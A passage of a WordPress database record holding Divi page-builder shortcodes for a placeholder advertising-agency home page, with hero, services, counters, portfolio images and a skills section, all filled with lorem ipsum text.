21:47:52','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.4.9\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" hover_enabled=\"0\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\" text_font_last_edited=\"on|phone\" content_last_edited=\"on|phone\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" text_font_size=\"18px\" text_font_size_last_edited=\"on|phone\" text_font_size_phone=\"12px\" header_font_size_phone=\"55px\" header_font_size_tablet=\"64px\" animation_duration=\"1200ms\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"UX Research\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Brand Identity\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Development\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" 